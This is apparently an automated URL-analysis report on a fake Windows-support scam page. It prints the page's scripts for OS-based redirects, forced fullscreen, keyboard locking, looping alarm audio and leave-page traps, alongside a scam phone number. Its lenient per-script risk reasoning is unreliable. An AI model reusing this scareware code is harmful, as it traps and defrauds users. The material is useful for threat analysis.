Windows Analysis Report
https://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": true,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://aggttt.z4.web.core.windows.net

{
    "risk_score": 2,
    "reasoning": "This script appears to be a simple IP geolocation lookup, which is a common and legitimate use case. It uses the XMLHttpRequest API to fetch data from the 'ipwho.is' service and displays the user's IP address, location, and ISP information on the page. While the script uses some older APIs like XMLHttpRequest, it does not exhibit any high-risk behaviors and is likely a benign implementation of a common web functionality."
}

      var t = new XMLHttpRequest;
      t.onreadystatechange = function() {
        if (4 == this.readyState && 200 == this.status) {
          var a = JSON.parse(this.responseText);
          ipadd = a.ip;
          city = a.city;
          country = a.country;
          isp = a.connection.isp;
          var b = new Date;
          currtime = a.timezone.current_time;
          document.getElementById("ip_add").textContent = "Address IP: " + ipadd + " " + b.toLocaleString("EN-US", currtime);
          document.getElementById("city").textContent = "Location: " + city + ", " + country;
          document.getElementById("isp").textContent = "ISP: " + isp
        }
      };
      t.open("GET", "https://ipwho.is/?lang=en", !0);
      t.send();
    

{
    "risk_score": 3,
    "reasoning": "The use of `document.write()` to dynamically insert content is a low-risk indicator, as it could be used for legitimate purposes like rendering placeholder content. However, the use of an undefined variable `bcda` suggests the script may be attempting to execute dynamic or untrusted code, which is a moderate-risk behavior. Overall, the risk is low to medium, and further investigation may be warranted to determine the script's true intent."
}

document.write(bcda)

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be a simple function that extracts a query parameter value from the current URL. This is a common and legitimate practice, and the code does not exhibit any high-risk indicators. The function uses standard JavaScript APIs and regular expressions, which are not inherently malicious. While the function name is obfuscated, this alone does not indicate a high-risk scenario. Overall, this script is likely benign and used for a legitimate purpose, such as retrieving user input or configuration data from the URL."
}

        function wevweewfwefegwwerewewefgew(name)
        {
            name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
            var regexS = "[\\?&]"+name+"=([^&#]*)";
            var regex = new RegExp( regexS );
            var results = regex.exec( window.location.href );
            if( results == null )
                return "";
            else
                return results[1];
        }
        var bcda = wevweewfwefegwwerewewefgew('bcda');
    

{
    "risk_score": 6,
    "reasoning": "The script demonstrates moderate-risk behaviors, including redirecting users to different domains based on their operating system and storing a query parameter in local storage. While the script does not exhibit any high-risk indicators, the redirects to potentially unknown or suspicious domains and the lack of transparency around the purpose of the script warrant further investigation."
}

        function getQueryParam(param) {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get(param);
        }
        function checkosSystemForScna() {
            const userAgent = navigator.userAgent;
            let os = "Unknown";
            if (userAgent.indexOf("Win") !== -1) {
                os = "Windows";
            }else if (userAgent.indexOf("iPhone") !== -1) {
                os = "iOS";
            }else if (userAgent.indexOf("Mac") !== -1) {
                os = "MacOS";
            } else if (userAgent.indexOf("Android") !== -1) {
                os = "Android";
            } else if (userAgent.indexOf("Linux") !== -1) {
                os = "Linux";
            } 
            return os;
        }
        let operatingSystem = checkosSystemForScna();
        localStorage.setItem('alpha',getQueryParam('alpha'));
        if(operatingSystem === 'MacOS'){
            window.location.href="merrx01usahtml/?bcda="+getQueryParam('bcda').trim();
        }else if(operatingSystem === 'Android') {
            window.location.href="andx01UShTml/?bcda="+getQueryParam('bcda').trim();
        }else if(operatingSystem === 'iOS') {
            window.location.href="ioxs01uShYMl/?bcda="+getQueryParam('bcda').trim();
        }else{
            window.location.href="werrx01USAHTML/?bcda="+getQueryParam('bcda').trim();
        }
    

{
    "risk_score": 4,
    "reasoning": "The script contains a mix of behaviors, some of which are low-risk (e.g., audio playback, DOM manipulation) and others that are moderately risky (e.g., full-screen functionality, event handling). While the script does not exhibit any clear malicious intent, the combination of behaviors and lack of transparency around the purpose of the script warrants further review."
}

function toggleFullScreen(e){var n=document.body;e instanceof HTMLElement&&(n=e);var t=document.webkitIsFullScreen||document.mozFullScreen||!1;n.requestFullScreen=n.requestFullScreen||n.webkitRequestFullScreen||n.mozRequestFullScreen||function(){return!1},document.cancelFullScreen=document.cancelFullScreen||document.webkitCancelFullScreen||document.mozCancelFullScreen||function(){return!1},t?document.cancelFullScreen():n.requestFullScreen()}function addEvent(e,n,t){e.addEventListener?e.addEventListener(n,t,!1):e.attachEvent&&e.attachEvent("on"+n,t)}$(document).ready(function(){var e=document.createElement("audio");e.setAttribute("src","ai2.mp3"),e.addEventListener("ended",function(){this.play()},!1),$(".map").click(function(){e.play()}),$(".black").click(function(){e.play()}),$("#footer").click(function(){e.play()}),$("#ddcascascsad").click(function(){e.play()})}),$(document).ready(function(){$("body").mouseover(function(){$("#footer").fadeIn("").css({bottom:-20,position:"fixed"}).animate({bottom:-20},200,function(){})})}),$(document).ready(function(){$(".arow-div").delay(1e3).fadeIn(500)}),$(document).ready(function(){$("#ddcascascsad").click(function(){$("#ddcascascsad").hide("fast")})}),$(document).ready(function(){$(".alert_popup").click(function(){$(".alert_popup").hide("fast")})}),$(document).ready(function(){$("#footer").click(function(){$("#ddcascascsad").hide("fast")})}),$(document).ready(function(){$(".black").click(function(){$(".delayedPopupWindow").hide("fast")})}),addEvent(document,"mouseout",function(e){null==e.toElement&&null==e.relatedTarget&&$(".lightbox").slideDown()}),$("a.close").click(function(){$(".lightbox").slideUp()}),$("body").click(function(){$(".lightbox").slideUp()}),window.addEventListener("beforeunload",function(e){var n="It looks like you have been editing something. If you leave before saving, your changes will be lost.";return(e||window.event).returnValue=n,n}),addEventListener("click",function(){var e=document.documentElement;(e.requestFullScreen||e.webkitRequestFullScreen||e.mozRequestFullScreen).call(e)});

{
    "risk_score": 5,
    "reasoning": "The script has a mix of behaviors, some of which are low-risk (using the `getQueryParam` function) and others that are moderate-risk (playing audio on click and locking the keyboard). The audio playback and keyboard locking features could be considered aggressive DOM manipulation and may impact user experience, warranting a medium-risk score. Further review is needed to determine the overall intent and potential impact of the script."
}

function getQueryParam(param) {
    const urlParams = new URLSearchParams(window.location.search);
    return urlParams.get(param);
}
$(document).ready(function(){

    var audioElement = document.createElement('audio');
    audioElement.setAttribute('src', 'Fm7-alert.wav');
    
    audioElement.addEventListener('ended', function() {
        this.play();
    }, false);
    addEventListener("click", function() {
        var el = document.documentElement
            , reffer =
                   el.requestFullScreen
                || el.webkitRequestFullScreen
                || el.mozRequestFullScreen
        ;
        reffer.call(el);
        audioElement.play();
    });

   if ('keyboard' in navigator && 'lock' in navigator.keyboard) {
        // Request to lock the keyboard
        navigator.keyboard.lock(['Escape', 'Space']); // Locks the 'Escape' and 'Space' keys
      } else {
        console.log('Keyboard Lock API is not supported in this browser.');
      }
    document.addEventListener('keydown', function(event) {
        event.preventDefault();
    }, false);
   
});

{
    "risk_score": 1,
    "reasoning": "The provided code appears to be the jQuery JavaScript library v1.4.4, which is a widely used and trusted open-source library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is well-structured and follows common JavaScript patterns, indicating it is likely a legitimate library with no apparent malicious intent."
}

/*!
 * jQuery JavaScript Library v1.4.4
 * http://jquery.com/
 *
 * Copyright 2010, John Resig
 * Dual licensed under the MIT or GPL Version 2 licenses.
 * http://jquery.org/license
 *
 * Includes Sizzle.js
 * http://sizzlejs.com/
 * Copyright 2010, The Dojo Foundation
 * Released under the MIT, BSD, and GPL Licenses.
 *
 * Date: Thu Nov 11 19:04:53 2010 -0500
 */
(function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof h==="function")h=
h.events;if(!(a.liveFired===this||!h||!h.live||a.button&&a.type==="click")){if(a.namespace)A=RegExp("(^|\\.)"+a.namespace.split(".").join("\\.(?:.*\\.)?")+"(\\.|$)");a.liveFired=this;var J=h.live.slice(0);for(k=0;k<J.length;k++){h=J[k];h.origType.replace(X,"")===a.type?f.push(h.selector):J.splice(k--,1)}f=c(a.target).closest(f,a.currentTarget);o=0;for(x=f.length;o<x;o++){r=f[o];for(k=0;k<J.length;k++){h=J[k];if(r.selector===h.selector&&(!A||A.test(h.namespace))){l=r.elem;e=null;if(h.preType==="mouseenter"||
h.preType==="mouseleave"){a.type=h.preType;e=c(a.relatedTarget).closest(h.selector)[0]}if(!e||e!==l)C.push({elem:l,handleObj:h,level:r.level})}}}o=0;for(x=C.length;o<x;o++){f=C[o];if(d&&f.level>d)break;a.currentTarget=f.elem;a.data=f.handleObj.data;a.handleObj=f.handleObj;A=f.handleObj.origHandler.apply(f.elem,arguments);if(A===false||a.isPropagationStopped()){d=f.level;if(A===false)b=false;if(a.isImmediatePropagationStopped())break}}return b}}function Y(a,b){return(a&&a!=="*"?a+".":"")+b.replace(La,
"`").replace(Ma,"&")}function ma(a,b,d){if(c.isFunction(b))return c.grep(a,function(f,h){return!!b.call(f,h,f)===d});else if(b.nodeType)return c.grep(a,function(f){return f===b===d});else if(typeof b==="string"){var e=c.grep(a,function(f){return f.nodeType===1});if(Na.test(b))return c.filter(b,e,!d);else b=c.filter(b,e)}return c.grep(a,function(f){return c.inArray(f,b)>=0===d})}function na(a,b){var d=0;b.each(function(){if(this.nodeName===(a[d]&&a[d].nodeName)){var e=c.data(a[d++]),f=c.data(this,
e);if(e=e&&e.events){delete f.handle;f.events={};for(var h in e)for(var l in e[h])c.event.add(this,h,e[h][l],e[h][l].data)}}})}function Oa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function oa(a,b,d){var e=b==="width"?a.offsetWidth:a.offsetHeight;if(d==="border")return e;c.each(b==="width"?Pa:Qa,function(){d||(e-=parseFloat(c.css(a,"padding"+this))||0);if(d==="margin")e+=parseFloat(c.css(a,
"margin"+this))||0;else e-=parseFloat(c.css(a,"border"+this+"Width"))||0});return e}function da(a,b,d,e){if(c.isArray(b)&&b.length)c.each(b,function(f,h){d||Ra.test(a)?e(a,h):da(a+"["+(typeof h==="object"||c.isArray(h)?f:"")+"]",h,d,e)});else if(!d&&b!=null&&typeof b==="object")c.isEmptyObject(b)?e(a,""):c.each(b,function(f,h){da(a+"["+f+"]",h,d,e)});else e(a,b)}function S(a,b){var d={};c.each(pa.concat.apply([],pa.slice(0,b)),function(){d[this]=a});return d}function qa(a){if(!ea[a]){var b=c("<"+
a+">").appendTo("body"),d=b.css("display");b.remove();if(d==="none"||d==="")d="block";ea[a]=d}return ea[a]}function fa(a){return c.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:false}var t=E.document,c=function(){function a(){if(!b.isReady){try{t.documentElement.doScroll("left")}catch(j){setTimeout(a,1);return}b.ready()}}var b=function(j,s){return new b.fn.init(j,s)},d=E.jQuery,e=E.$,f,h=/^(?:[^<]*(<[\w\W]+>)[^>]*$|#([\w\-]+)$)/,l=/\S/,k=/^\s+/,o=/\s+$/,x=/\W/,r=/\d/,A=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,
C=/^[\],:{}\s]*$/,J=/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,w=/"[^"\\\n\r]*"|true

{
  "contains_trigger_text": true,
  "trigger_text": "Rufen Sie den Windows-Support an: 00-1-234-294-2156",
  "prominent_button_name": "OK",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": true,
  "has_visible_qrcode": false,
  "contains_chinese_text": false
}

{
  "brands": [
    "Microsoft",
    "Copilot"
  ]
}

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The URL 'aggttt.z4.web.core.windows.net' is hosted on a Microsoft Azure domain, which is a legitimate cloud service provider.",    "The brand 'Microsoft' is well-known and commonly associated with the domain 'microsoft.com'.",    "The subdomain 'aggttt.z4' does not directly match any known Microsoft services or products, which could indicate a custom deployment by a user of Azure services.",    "The presence of 'web.core.windows.net' suggests the use of Azure's static website hosting, which is legitimate but can be used by third parties.",    "No direct association between the subdomain and Microsoft itself, which raises suspicion."  ],  "riskscore": 5}

URL: aggttt.z4.web.core.windows.net
			Brands: Microsoft
			Input Fields: unknown